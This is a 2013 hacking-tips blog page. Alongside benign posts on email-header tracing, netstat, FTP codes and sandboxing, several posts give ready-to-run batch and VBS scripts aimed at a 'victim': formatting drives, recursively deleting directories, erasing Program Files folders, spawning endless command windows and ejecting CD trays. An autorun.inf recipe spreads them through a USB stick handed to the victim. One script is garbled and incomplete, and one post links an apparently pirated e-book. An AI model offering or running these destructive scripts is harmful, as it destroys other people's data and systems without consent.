Nuffnang Ads

Tuesday, June 25, 2013

Toggle Caps Lock

This code will toggle the caps lock button simultaneously...quite annoying >.<

Copy the following code into notepad:

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

Save as Hackmimic_capslock.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Monday, June 24, 2013

Hit Enter Key

This code will send enter key simultaneously to the victim machine. It will be stop after the computer restart.

Copy the following code into notepad:

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

Save as Hackmimic_enter.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Sunday, June 23, 2013

Pop Out CD Drive

This code will pop out all the CD Drive of your victim, if there are more than one, it pop out all.
Quite stupid yet fun...restart the pc will clear and stop the script.

Copy the following code into notepad:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000

Save as Hackmimic_popout.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Saturday, June 22, 2013

Remove Directory

When executed, this code will actually delete all directories and files in the specific directory. Work similar to delete/erase but instead of a file at a time, rd command is to remove the whole directory, leave you a fresh empty folder.

Copy the following code into notepad:

rd J:\ /s /q

Save as Hackmimic_rd.bat

Remove Directory Help

RMDIR [/S] [/Q] [drive:]path
RD [/S] [/Q] [drive:]path

    /S      Removes all directories and files in the specified directory
            in addition to the directory itself.  Used to remove a directory

    /Q      Quiet mode, do not ask if ok to remove a directory tree with /S

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Friday, June 21, 2013

Format Drive

The following code will format all the define drive letter in computer.

Copy the code below into notepad:

format D: /q /x

Save as Hackmimic_format.cmd

Good to go now...

*Replace D for any other drive letter
*You can make multiple line for different disk drive
*Perform a test on USB drive to check result

Format Help

FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X]
FORMAT volume [/V:label] [/Q] [/F:size]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors]
FORMAT volume [/V:label] [/Q]
FORMAT volume [/Q]

  volume          Specifies the drive letter (followed by a colon),
                  mount point, or volume name.
  /FS:filesystem  Specifies the type of the file system (FAT, FAT32, or NTFS).
  /V:label        Specifies the volume label.
  /Q              Performs a quick format.
  /C              NTFS only: Files created on the new volume will be compressed
                  by default.
  /X              Forces the volume to dismount first if necessary.  All opened
                  handles to the volume would no longer be valid.
  /A:size         Overrides the default allocation unit size. Default settings
                  are strongly recommended for general use.
                  NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
                  FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).
                  FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).

                  Note that the FAT and FAT32 files systems impose the
                  following restrictions on the number of clusters on a volume:

                  FAT: Number of clusters <= 65526
                  FAT32: 65526 < Number of clusters < 4177918

                  Format will immediately stop processing if it decides that
                  the above requirements cannot be met using the specified
                  cluster size.

                  NTFS compression is not supported for allocation unit sizes
                  above 4096.

  /F:size         Specifies the size of the floppy disk to format (1.44)
  /T:tracks       Specifies the number of tracks per disk side.
  /N:sectors      Specifies the number of sectors per track.

*Search this blog for autorun script and automate it.
Feel free to leave comments~


Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.

Here is a brief table of contents for Singh's book:

Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, pivoting, and killing firewalls
Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
Chapter 8: Working with Exploits covering: mixins, msfvenum, going from exploit to Metasploit module, and fuzzing
Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.

To summarize, if you are looking for a Metasploit book in cookbook format than this book would be a good choice.  

Metasploit Official Website:
Download E-Book: DOWNLOAD
Unlock Password:
*leave a message for my if link is dead

Thursday, June 20, 2013

Penetration Test

Penetration testing in simple words can be defined as the test on the live networks or servers directly by attacking by the trained ethical hacking professional person or network security administrator.

If you still cant get, let me make it simpler for you. Consider an organization having its employee working on certain software. It stores all database into some kind of “database server”. What will we do is just hire some ethical hacking trained person & he will directly conduct the test on the possible vulnerable areas of the system or network or the software.

Classification of Penetration Testing

Penetration testing is basically classified according to the things that are known to ethical hackers. It is classified as follows

- White Box Testing
- Black Box Testing

In white box tests the ethical hacker physically sees all network & its previous data & updates. Means he knows everything then he performs testing.

In black box testing ethical hackers do complete attack without knowing even the operating stem on the networks. So black box test is real hard thing to do in ethical hacking.

Wednesday, June 19, 2013

Delete Folder

This code will delete anything define when executed.
Copy the following code into notepad without the quote:

"erase C:\Program Files\Common Files"

Save as "Hackmimic.cmd"

When execute, the common files folder inside program files will be permanently deleted.

For Testing

Create a text file in C: drive
Name it as hackmimic.txt
Use "erase C:\hackmimic.txt"

Erase Help

Deletes one or more files.

DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

  names         Specifies a list of one or more files or directories.
                Wildcards may be used to delete multiple files. If a
                directory is specified, all files within the directory
                will be deleted.

  /P            Prompts for confirmation before deleting each file.
  /F            Force deleting of read-only files.
  /S            Delete specified files from all subdirectories.
  /Q            Quiet mode, do not ask if ok to delete on global wildcard
  /A            Selects files to delete based on attributes
  attributes    R  Read-only files            S  System files
                H  Hidden files               A  Files ready for archiving
                -  Prefix meaning not

If Command Extensions are enabled DEL and ERASE change as follows:

The display semantics of the /S switch are reversed in that it shows
you only the files that are deleted, not the ones it could not find.

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Autorun File

Create an autorun file that will execute other files when loaded.

Step by Step Tutorial

  1. Open notepad, type the following code inside.
  2. [AUTORUN] open=filename.extension
  3. Save as "autorun.inf"
  4. Finish, Simple, Thats it!
So, what we can do with it?
Go back to step 2 and check on the filename.extension, usually...
We put our simple script file to it such as shutdown.bat, format.cmd, and etc.
Finally, copy both file into an USB or CD and pass it to your victim. Watch the result.

Tuesday, June 18, 2013

How Spammers get your Email

Spam is amazing. In an unprecedented and astonishing effort, junk email reaches almost everybody online.
All it takes to get on the mailing lists used by spammers is an email address. There is no need to sign up for anything or ask for emails. The spam just starts coming, out of nowhere, apparently without any plan, and without a reason. It invades email addresses that are never used.

But how do spammers discover email addresses? How do they find your mailbox when your best friend does not?

Dictionary Attack

Big free email providers like Windows Live Hotmail or Yahoo! Mail are a spammer's paradise, at least when it comes to finding spammable addresses.

Millions of users share one common domain name, so you already know that ("" in the case of gmail). Try to sign up for a new account and you will discover that guessing an existing user name is not difficult either. Most short and good names are taken.

So, to find email addresses at a large ISP, it's enough to combine the domain name with a random user name. Chances are both "ethan1@hotmailcom" and "" exist.

To beat this kind of spammer attack, use long and difficult addresses.

Brute Searching Force

Another tactic employed by spammers to discover email addresses is to search common sources for email addresses. They have robots scanning web pages and following links.

These address harvesting bots work a lot like the search engines' robots, only they're not after the page content at all. Strings with '@' somewhere in the middle and a top-level domain at the end are all the spammers are interested in.

While not picky, the pages the spammers are particularly keen to visit are web forums, chat rooms and web-based interfaces to usenet because lots of email addresses are likely to be found there.

This is why you should

  • disguise your email address when you use it on the net or, better yet,
  • use disposable email addresses.

If you post your address on your own web page or blog, you can

Encode it
so visitors who want to send you an email can see and use it, but spambots cannot. Again,

Using a disposabe address
provides a very effective and at the same time convenient alternative.

Worms Turning Infested PCs Into Spam Zombies

To avoid being detected and filtered, spammers seek to send their emails from a distributed network of computers. Ideally, these computers are not even their own but those of unsuspecting users.

To build such a distributed network of spam zombies, spammers cooperate with virus authors who equip their worms with small programs that can send bulk emails.

Additionally, these spam sending engines will often scan the user's address book, web cache and files for email addresses. That's another chance for spammers to catch your address, and this one is particularly difficult to avoid.

The best anybody can do is

  • keeping their email program updated and patched,
  • being vary of any attachments they did not request and
  • doing virus scans with a free, up to date scanner regularly.

Monday, June 17, 2013

Infinite Loop

This code will continuously show message to the target machine until the victim manually close it.
Copy the following code into notepad:
@ECHO off
msg * Gotcha! Say cheese...

This code will continuously open up command prompt screen infinite times and  irritate victim and affecting performance.
Copy the following code into notepad:
start cmd.exe


save as Hackmimic_msg.bat, then you can open the file.

*You can replace with any message after the echo tag with a space.
*You can put multiple echo as well.
*Search this blog for autorun script and automate it.
Feel free to leave comments~

Thursday, June 13, 2013

ASCII Description & Table


ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as 'a' or '@' or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want 'plain' text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as 'text only'


Extended ASCII Table

Wednesday, June 12, 2013

Password Protect Google Chrome

Simple Startup Password is an addon for Google Chrome browser that blocks unauthorized people from using your browser.  Just go to the extensions gallery of Google Chrome and install the Simple Startup Password add-on for your browser.
After installing the add-on go to Settings -> Tools ->Extensions. There look for Simple Startup Password and click on Options. Set a password for your browser and done. Now every time you start your Google Chrome browser it will ask you for the password and if you fail to give the correct password your browser will be closed.

You can get this add on from Google Chrome’s extensions gallery.
Link : Simple Startup Password for Google Chrome

In case you forget your password there is no option to recover it. You will have to re-install the browser.

Trace Email

While sending or receiving an email ,our browser uses two protocols:
SMTP(Simple mail transfer protocol)Port 25
POP(Post office protocol)Port 110

Whenever click on the send button of your browser for sending a mail, the mail first reaches the Source mail server from there it goes to Interim mail server from there it moves to Destination  mail server and at last to destination inbox. So as you see its not a complicated process and can be described by the following diagram: |Sender Outbox-----> Source Mail Server-----> Interim Mail Servers-----> Destination Mail Server------> Destination Inbox|

All the emails does not travel alone they carry email header with them.
This email header reveals the path taken by the email to reach its

Tracing Time:

Here I will take a real life example of a email that was send to me.
The email header is:

From John Wed Jun 12 20:36:53 2013

X-Apparently-To: via; Wed, 12 Jun 2013 20:36:53 +0530

Return-Path: <>


X-Originating-IP: []

Received: from  (HELO (

by with SMTP; Wed, 12 Jun 2013 20:36:53 +0530

From: John <>

Subject:Stop paying for CDs.

Date: Wed, 12 Jun 2013 11:06:53 EDT

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

Before tracing the first thing is to divide the mails in 3-4 lines and then
I will explain you each line.
So lets begin:
Date: Wed, 12 Jun 2013 11:06:53 EDT

From: John <>


Subject:Stop paying for CDs.

Date: Wed, 12 Jun 2013 11:06:53 EDT

This line tells us the date on which the mail was sent to me.
From: John <>

This line tells me the email of the person who sent the the mail.
This line tells us to whom the mail was sent , in this case it is my email.
Subject:Stop paying for CDs.
This line tells us the subject of the message.

X-Apparently-To: via; Wed, 12 Jun 2013 20:36:53 +0530

Return-Path: <>


X-Apparently-To: via; Wed, 12 Jun 2013 20:36:53 +0530

This line tells me the that the message was sent to my email via
on Wednesday 12nd June 2013.
Return-Path: <>

again this line tells me the email of the person who send me this mail.

This line tells me that the message was filtered by
X-Originating-IP: []

This line tells me the IP address of the person who send me this email.
Received: from  (HELO (

by with SMTP; Wed, 12 Jun 2013 20:36:53 +0530

Again this line tells us the IP address of the person who sent this mail and contain some SMTP command which you will learn in the next lesson.

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

MIME-Version: 1.0
This line tells me the software that the attacker used to send me the
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of the text the email used.
The header can be viewed by going to action in yahoo mail and in gmail it would be found in settings. If you use some other website then the best way is to find it using google. Now if you have got the IP address what can you do?

The answer is very simple you can just do a whois scan for that IP address.
Whois is a tool that has information about all the hosts.When I did a whois scan for the above IP address it reavels the following information:

Whois IP

Updated 1 second ago
# ARIN WHOIS data and services are subject to the Terms of Use
# available at:

# The following results may also be obtained via:

# start

NetRange: -
NetName:        DRAGON-BLK-1
NetHandle:      NET-209-124-64-0-1
Parent:         NET-209-0-0-0-0
NetType:        Direct Allocation
RegDate:        1999-04-20
Updated:        2012-03-02

OrgName:        Dragon Networks, Inc.
OrgId:          DRAGON-8
Address:        93, Moor Lane
City:           Wilmslow
StateProv:      Cheshire
PostalCode:     SK9 6BR
Country:        GB
RegDate:        2002-05-19
Updated:        2012-06-21

OrgAbuseHandle: ABUSE1150-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1 404.300.9889 

OrgNOCName:   Smith, Charles T
OrgNOCPhone:  +1 404-949-7884 

OrgTechHandle: ABUSE1150-ARIN
OrgTechName:   Abuse
OrgTechPhone:  +1 404.300.9889 

# end

# start

NetRange: -
OriginAS:       AS22653
NetName:        NET-209-124-87-0-1
NetHandle:      NET-209-124-87-0-1
Parent:         NET-209-124-64-0-1
NetType:        Reassigned
RegDate:        2013-04-26
Updated:        2013-04-26

OrgName:        J. Eaton
OrgId:          JE-98
Address:        PO Box 3109 # 22016
City:           Houston
StateProv:      TX
PostalCode:     77253-3109
Country:        US
RegDate:        2013-04-26
Updated:        2013-04-26

OrgAbuseHandle: ADMIN4210-ARIN
OrgAbuseName:   Administrator
OrgAbusePhone:  +1-760-683-4974 

OrgTechHandle: ADMIN4210-ARIN
OrgTechName:   Administrator
OrgTechPhone:  +1-760-683-4974 

# end

# ARIN WHOIS data and services are subject to the Terms of Use
# available at: 


iMacros is an extension for the Mozilla Firefox, Google Chrome, and Internet Explorer web browsers which adds record and replay functionality similar to that found in web testing and form filler software. The macros can be combined and controlled via JavaScript. Demo macros and JavaScript code examples are included with the software. iMacros was developed by iOpus. First released in 2001, iMacros was the first macro recorder tool specifically designed and optimized for web browsers and form filling.
iMacros for Firefox and Chrome offers a feature known as social scripting. It allows users to share macros and scripts in a way that is similar to how they share bookmarks on the many social bookmarking websites. After creating a new macro, users can click just once to share it with their friends as a link, either by distributing the link via email and social bookmarking websites, or by embedding it in a website or blog for public access. Technically, this is accomplished by embedding the imacro and the controlling JavaScript inside a plain text link.

Along with the freeware version, iMacros is available as a proprietary commercial application, with additional features and support for web scripting, web scraping, internet server monitoring, and web testing. In addition to working with HTML pages, the commercial editions can automate Adobe Flash, Adobe Flex, Silverlight, and Java applets by using Directscreen and image recognition technology.
Advanced versions also contain a command-line interface and an application programming interface (API) to automate more complicated tasks and integrate with other programs or scripts. The iMacros API is called Scripting Interface. The Scripting Interface of the iMacros Scripting Edition is designed as a Component Object Model (COM) object and allows the user to remotely control (script) the iMacros Browser, Internet Explorer, and Firefox from any Windows programming or scripting language.

Friday, June 7, 2013

Track Down a Hacker

Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is on-board, how it got there - but most importantly, who put it there.
By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against.

Connections make the world go round

The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place. 

# How do these people find their victim? 
Well, first of all, they need to get hold of the victim's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc). 

With an IP address, a Hacker can find out all sorts of weird and wonderful things about their victim (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS ((Denial of Service)) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain - until recently, many realtime chat applications (such as MSN) were goldmines of information. Your IP Address is contained as part of the Header Code on all emails that you send and webpages that you visit can store all kinds of information about you. 

A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting victim visits, everything about your computer from the operating system to the screen resolution can be logged...and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit. 

So now that you know some of the basic dangers, you're probably wondering how these people connect to a victim's machine? 

Virtual and Physical Ports

Everything that you recieve over the Internet comes as a result of other machines connecting to your computer's ports. You have two types; Physical are the holes in the back of your machine, but the important ones are Virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without, but knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.

What the phrases TCP/UDP actually mean?

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent you it. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on, and that tool is NETSTAT. 

Netstat: Your first line of defence

Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems), and in the MSDOS Prompt, type: 

netstat -a 
(make sure you include the space inbetween the "t" and the "a"). 
If you're connected to the Internet when you do this, you should see something like: 

Active Connections 
Proto Local Address Foreign Address State 
TCP macintosh: 20034 50505 ESTABLISHED 
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT 

Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc. 

Now, you need to know all of Netstat's various commands, so type: 

netstat ? 

You will get something like this: 
Displays protocol statistics and current TCP/IP network connections. 
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 
-a Displays all connections and listening ports. 
-e Displays Ethernet statistics. This may be combined with the -s option. 
-n Displays addresses and port numbers in numerical form. 
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. 
-r Displays the routing table. 
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. 

Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is 

netstat -an 

because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful. 

netstat -b 
will tell you what ports are open and what programs are connecting to the internet. 

Types of Port

It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port: 

# Well Known Ports These run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is smtp (Simple Mail Transfer Protocol) so if you find one of these ports open (and you usually will), it's usually because of an essential function. 

# Registered Ports These run on 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, Email client and so on, and they do this by opening on a random port within this range before communicating with the remote server, so don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the system that's running on them terminates (for example, type in a common website name in your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote servers). Services like MSN Messenger and ICQ usually run on these Ports. 

# Dynamic/Private Ports Ranging from 49152 to 65535, these things are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap: 

Well Known Ports 0 to 1023 Commonly used, little danger. 
Registered Ports 1024 to 49151 Not as common, just be careful. 
Dynamic/Private Ports 49152 to 65535 Be extremely suspicious. 

The hunt is on

Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive...they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at that first example of Netstat.... 

Active Connections 
Proto Local Address Foreign Address State 
TCP macintosh: 27374 50505 ESTABLISHED 
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT 

Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (ie for all intents and purposes, its how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages're simply connected to the net through proxy. 

So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is: 

1) run Netstat , and use: 
Netstat -a 
Netstat -an 
So you have both Hostnames AND IP addresses. 


Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address, you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you jknow how they work? 

Go back to MSDOS and type 

tracert *type IP address/Hostname here* 

Now, what happens is, the Traceroute will show you all the computers inbetween you and the target machine, including blockages, firewalls etc. More often than not, the hostname address listed before the final one will belong to the Hacker's ISP Company. It'll either say who the ISP is somewhere in there, or else you run a second trace on the new IP/hostname address to see who the ISP Company in question is. 

If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as 

Well, that tells us nothing, right? Wrong....simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in. 

If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 by Telnet, which will tell you how many hours ahead or behind this ISP is of GMT, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace. Similarly, a common tactic of Hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial). 

Reverse DNS Query

This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go, with regard to finding out what country (even maybe what State/City etc) someone resides, although it's actually almost impossible to find an EXACT geographical location without actually breaking into your ISP's Head Office and running off with the safe. 

To run an rDNS query, simply go back to MS-DOS and type 
netstat and hit return. Any active connections will resolve to hostnames rather than a numerical format. 


DNS stands for Domain Name Server. These are machines connected to the Internet whose job it is to keep track of the IP Addresses and Domain Names of other machines. When called upon, they take the ASCII Domain Name and convert it to the relevant numeric IP Address. A DNS search translates a hostname into an IP address....which is why we can enter "" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Well, Reverse DNS, of course, translates the IP Address into a Hostname (ie - in letters and words instead of numbers, because sometimes the Hacker will employ various methods to stop Netstat from picking up a correct Hostname). 

So, for example, is NOT a Hostname. IS a Hostname. 

Anyway, see the section at the end? (au) means the target lives in Australia. Most (if not all) hostnames end in a specific Country Code, thus narrowing down your search even further. If you know your target's Email Address (ie they foolishly sent you a hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the Country codes to deduce where they're from as well. 

You can also deduce the IP address of the sender by looking at the emails header (a "hidden" line of code which contains information on the sender)...on Hotmail for example, go to Preferences, and select the "Full Header's Visible" option. Alternatively, you can run a "Finger" Trace on the email address, at: 

Plus, some ISP's include their name in your Email Address with them too (ie Wanadoo, Supanet etc), and your Hacker may be using an email account that's been provided by a Website hosting company, meaning this would probably have the website host's name in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously) or report abuse of that Website Provider's Email account (and thus, the Website that it goes with) to 

FTP Error Codes

FTP Error Messages 

Some nice info about ftp error codes so you know what they mean. I am sure you see them all the time and sometimes you dont know what they mean, so take a look here.

The most common codes: 

421 - often means: too many users logged to the same account.
530 - wrong login pass, some servers auto-switch to 530 from
421 when they reach the max # of users. so notice the error message attached to the code.
550 - common in Ratio site, If the file exsist it means you have no access to the file or dir.

If you try changing directories in an FTP and you`re getting a 550
message, it means you don`t have access to the directory.

It doesn`t mean you don`t have access to a directory inside that directory. (Meaning when getting a direct path, log into
the path directly, not 1 directory by 1).

All others: 

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.

Thursday, June 6, 2013

Sand Box

What is sand box?

sandbox is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers, untrusted users and untrusted websites.

The sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as scratch space on disk and memory. Network access, the ability to inspect the host system or read from input devices are usually disallowed or heavily restricted.


Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.

The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Benefits of the Isolated Sandbox
  1. Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
  2. Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
  3. Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
  4. Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.

Tuesday, June 4, 2013

Types Of Hackers

Hacker: people who access a computer resource, without authorization, uses his or her skills to commit unlawful acts, or to deliberately create mischief.

There are six types of hackers:


The Real Hackers are the Coders, the ones who revise the methods and create tools that are available in the market. Coders can find security holes and weaknesses such as buffer overflow in software to create their own exploits.

Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques, however they uses the tricks which are already prepared by the coders. They are generally System Administration, or Computer Network Controller. Most of the Hackers and security person in this  digital world come under this category.


Script Kiddies are the bunnies who use script and programs developed by others to attack computer systems and Networks. They get the least respect but are most annoying and dangerous and can cause big problems without actually knowing what they are doing.

A White Hat Hacker is computer guy who perform Ethical Hacking. These are usually security professionals with knowledge of hacking and the Hacker tool set and who use this knowledge to locate security weaknesses and implement counter measures in the resources. They are also known as an Ethical Hacker or a Penetration Tester. They focus on Securing and Protecting IT systems.

A  Hacker is computer guy who performs Unethical Hacking. These are the Criminal Hackers or Crackers who use their skills and knowledge for illegal or malicious purposes. They break into or otherwise violate the system integrity of remote machines, with malicious intent. These are also known as an Unethical Hacker or a Security Cracker. They focus on Security Cracking and Data stealing.

A Grey Hat Hacker is a Computer guy who sometimes acts legally, sometimes in good will, and sometimes not. They usually do not hack for personal gain or have malicious intentions, but may or may not occasionally commit crimes during the course of their technological exploits.They are hybrid between White Hat and Black Hat Hackers.

Common Run Command

compmgmt.msc = computer management
certmgr.msc = certificate manager
diskmgmt.msc = disk management
devmgmt.msc = device manager
eventvwr.msc = event viewer
